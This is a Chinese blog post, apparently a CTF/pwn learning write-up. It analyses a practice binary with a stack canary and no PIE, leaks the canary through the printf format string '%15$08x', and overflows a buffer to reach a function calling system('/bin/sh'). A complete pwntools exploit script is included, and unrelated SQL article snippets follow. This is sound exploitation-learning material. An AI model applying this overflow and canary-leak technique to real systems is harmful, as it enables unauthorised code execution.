pwn学习总结 栈溢出,canary绕过和格式化字符串

最新推荐文章于 2024-05-04 18:34:55 发布
最新推荐文章于 2024-05-04 18:34:55 发布
阅读量886 收藏 10
点赞数 3
分类专栏: Pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/MrTreebook/article/details/121136439
版权

pwn学习总结 栈溢出,canary绕过和格式化字符串

目录

1. checksec看一下保护

在这里插入图片描述

  • 开启了Canary和NX
  • 有canary保护
  • 并且堆栈不可执行
  • PIE没有开,可以直接使用函数地址

2. IDA 看一下

在这里插入图片描述

在这里插入图片描述

  • 可以看到read函数可以读入0x50长度的字符
  • buf的空间只有32,可以溢出
  • 但是要绕过canary
  • 所以我用gdb动态调试一下
    在这里插入图片描述
  • 接着我们又看到了exploit函数
  • 里面有system("/bin/sh")
  • 可以获取权限
  • 那么整个溢出的思路就有了
  • 先找到canary的偏移
  • 再利用printf格式化字符串泄露canary的地址
  • 再构造payload
  • 那么payload = 垃圾数据 + canary + 垃圾数据 + expolit函数地址

3. gdb动态调试

在这里插入图片描述

3.1. gdb打开canary1文件,断点先下在main函数上

  • 开始执行gdb调试
    在这里插入图片描述

3.2. disass命令查看一下func函数的汇编代码

在这里插入图片描述

3.3. 首先看一下canary的偏移是多少

  • 所以我把断点下在printf函数前 在这里插入图片描述

3.4. 在上面的func函数的汇编代码中可以看到canary的偏移量是多少

在这里插入图片描述

  • canary放到了[ebp - 0xc]这个位置上

3.5. 看一下canary的地址

在这里插入图片描述

3.6. 看一下栈,计算一下溢出量

在这里插入图片描述

  • 先看一下canary需要泄露多少数据
  • 数一下知道是15个
(gdb) %15$08x
  • 用printf函数就可以泄露到canary的地址
    在这里插入图片描述
  • 可以看到我们已经拿到了canary
    在这里插入图片描述
  • 我打入的Microsoft是在0xffffd11c
  • 返回地址是0xffffd14c
  • canary的地址是0ffffd13c
  • 数一下
  • 需要覆盖4*8字节
  • 然后加上canary
  • 再填入垃圾数据3*4字节
  • 最后加上返回地址
    在这里插入图片描述

addr_exploit = 0x565561c9

4. exp入下

from pwn import *
p = process("./canary")
addr_exploit = 0x565561c9
str = "%15$08x"
p.sendline(str)
canary = int(p.recv(),16)
print(canary)
payload = 32 * 'a' + p32(canary) + 12 * 'a' + p32(0x565561c9)
p.sendline(payload)
p.interactive()

5.运行脚本

在这里插入图片描述
可以看到我们已经成功地获取到本机权限

ETL-笔试题(二)答案
热门推荐
沫颜之念...
11-19 1万+
ELT 笔试题 (难易比例 60%,40%) 一 .选择题 (每题 1分) 1、在sql的查询语句中,用于分组查询的语句是(  C  )。 a)order by    b)where     c)group by      &nbsp
mysql基础笔记(黑马)
敲代码的派大星
09-21 811
包含基本SQL语句、函数、约束、多表查询、事物等概念
SQL学习02---查改增删
乃乃天外仙
04-07 398
声明:很多文字和代码参考书籍:《数据库系统中文第6版》 1.select后接字段的规则 任何出现在having子句中,但没有被聚集的属性必须出现在group by子句中,否则查询就被当成是错误的。 2.SQL语句执行顺序 包含聚集、group by或having子句的查询的含义可通过 下述操作序列来定义: 1.与不带聚集的查询情况类似,最先根据from子句来计 算出一个关系。 2.如果出现了whe...
oracle学习总结(三)
冲神很牛b的博客
09-16 385
一.组函数 1.常用的组函数 count(),avg(),max(),min(),sum() 2.sql中分组语句 group by 注意:where 后面不能出现组函数。 但可以间接使用 select id,last_name,salary from s_emp where
【大数据系列之MySQL】(二十七):子查询的经典使用案例
优快云 精品推荐
12-19 1415
先查询出部门的平均工资,然后在查哪个部门的平均工资最低,再查哪个部门的平均工资等于最低工资,最后查询部门信息。首先查询出公司的平均工资,然后再查询出各部门的平均工资,然后使用having进行筛选。先查询出平均工资最高的job_id是什么,然后再去job表中查询。首先查询出公司中所有的manager的id,然后使用in去做遍历。(from后表子查询,where后标量子查询)首先查询出最低工资,然后使用该工资进行筛选。(where后标量子查询)
day07数据库操作练习
weixin_46048780的博客
01-29 217
myql练习
01-MySQL 基础笔记
最新发布
qq_43470538的博客
05-04 1292
MySQL 基础知识点笔记
MySQL基础笔记(1)——基础语法
qq_57350913的博客
03-05 475
什么是数据库数据库(DB)是按照数据结构来组织,存储和管理数据的仓库。 数据库管理系统(DBMS)则是数据库管理系统,用于创建,管理和维护数据库时所用到的软件,介于用户和和操作系统中间。 如果把数据库当做一个巨大可实用的机器,那么数据库管理系统就是负责传递用户的意愿,帮助两者建立操作关系的介质 数据库管理系统 在学习之前,看了很多的博客和文章,大多数人多推荐使用mysql数据库管理系统 这是全球DBMS使用人气排行榜 在学校里所使用的大多是微软公司的SQL Server,而且是
康师傅mysql基础pdf
01-28
康师傅mysql基础pdf可能是一份教程或教材,涵盖了MySQL基础知识,包括安装、配置、基本操作以及一些核心概念。在这里,我们将深入探讨MySQL的一些关键点。 1. **安装与配置**: MySQL的安装通常涉及下载安装包,...
MySQL基础学习笔记.docx
09-16
笔记主要涵盖了MySQL基础知识,包括数据库的基本概念、MySQL的卸载与安装、数据库的使用以及SQL语句的介绍。 首先,MySQL采用客户机/服务器(C/S)架构,通过TCP/IP协议进行通信。在该架构中,服务器端负责...
MySQL练习
Java技术
07-17 386
-- 创建一个学生表,包含如下字段:NAME age english create table student( name varchar(20), age int, english int ) insert into student values('马化不痛',60,70),('李彦宏',25,50),('柳传志',18,null) -- 查询年龄大于20岁 SELECT * FROM ...
经典Mysql语句(二)
weixin_38927257的博客
06-09 1696
一、查询平均成绩大于等于60分的同学的学生编号和学生姓名和平均成绩 获取sql表点击这里 SELECT st.`s_name`,s.`s_id`,AVG(s_score) AS total FROM score s LEFT JOIN student st ON st.`s_id`=s.`s_id` AND s_score > 60 看到这个题目的时候,想这届用这条sql求出平均值大于等于...
MySQL基础(三)
qq2835483738的博客
07-09 368
MySQL 多表查询与事务的操作 第一章 表连接查询 1.1 多表查询 数据准备 # 创建部门表 create table dept( id int primary key auto_increment, name varchar(20) ) insert into dept (name) values ('开发部'),('市场部'),('财务部'); # 创建员工表 create table emp ( id int primary key auto_increment, name varc
Oracle查询各个部门工资小于各个部门平均工资的员工
十年饮冰,难凉热血
07-12 8354
时时想着 SELECT A.* FROM emp A, ( SELECT deptno, AVG(sal) t --部门平均工资 FROM emp GROUP BY deptno ) B --B表分组后得到的视图 WHERE A.deptno=B.deptno --将
oracle笔记系列(三)
雪顶儿的博客
03-04 341
lesson 5:Group Function概念: 所谓组查询即将数据按照某列或某些列相同的值进行分组,然后对该组数据进行组函数运用,针对每一组返回一个结果。    group by :在查询表中数据的时候进行分组的关键字    having :分组之后的进行进一步数据筛选的关键字(having和where的功能类似)    note:       ①组函数可以出现的位置: select子句和h...
MySQL 子查询
weixin_65637841的博客
06-18 2968
1..子查询介绍 2.需求分析与问题解决 3. 单行子查询 4. 多行子查询
MySQL小题
weixin_67450855的博客
07-02 3156
多看多记多理解
Day08-作业(MySQL&Mybatis入门)
chuanchengdabing的博客
07-31 1554
掌握连接查询的基础语法; 能说出内连接、外连接的区别; 能通过连接查询、子查询等方式完成多表查询操作(※); 能说出什么是事务; 能通过SQL来开启事务、提交事务、回滚事务; 能说出事务的四大特性(面试); 能说出什么是索引及优缺点; 能完成索引的创建、查询、删除等基础操作; 能说出MySQL数据库索引的数据结构; 能完成SpringBoot-Mybatis的入门程序; 能说出什么是JDBC以及什么是数据库驱动; 能说出数据库连接池的作用; 掌握lombok工具包的使用;
SQL数据库的T-SQL 查询语句
玩IT的川
07-09 1万+
T-SQL 查询语句 一、简单查询 1、列出全部学生的信息。 SELECT * FROM 学生表 2、列出软件测试专业全部学生的学号及姓名。 SELECT 学号,姓名 FROM 学生表WHERE 专业=‘软件测试’ 3、列出所有必修课的课号。 方法一:SELECT 课号 FROM 课程表 where 类型='必修课' 方法二:SELECT DISTINCT 课号 FROM 选课...
mysql黑马笔记基础
05-23
MySQL是一种关系型数据库管理系统,常用于Web应用程序的开发。以下是MySQL基础知识的笔记: 1. 数据库的创建和删除 - 创建数据库:CREATE DATABASE database_name; - 删除数据库:DROP DATABASE database_name; 2. 表的创建和删除 - 创建表:CREATE TABLE table_name (column_name1 data_type1, column_name2 data_type2, ...); - 删除表:DROP TABLE table_name; 3. 数据的插入、查询、更新和删除 - 插入数据:INSERT INTO table_name (column1, column2, ...) VALUES (value1, value2, ...); - 查询数据:SELECT column1, column2, ... FROM table_name WHERE condition; - 更新数据:UPDATE table_name SET column1 = value1, column2 = value2, ... WHERE condition; - 删除数据:DELETE FROM table_name WHERE condition; 4. 数据类型 - 数值类型:INT, FLOAT, DOUBLE, DECIMAL, ... - 字符串类型:CHAR, VARCHAR, TEXT, ... - 日期时间类型:DATE, TIME, DATETIME, TIMESTAMP, ... 5. 约束 - 主键:PRIMARY KEY - 外键:FOREIGN KEY - 唯一约束:UNIQUE - 非空约束:NOT NULL 6. 关联查询 - 内连接:INNER JOIN - 左连接:LEFT JOIN - 右连接:RIGHT JOIN 以上是MySQL基础知识的笔记,希望能对你有所帮助。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值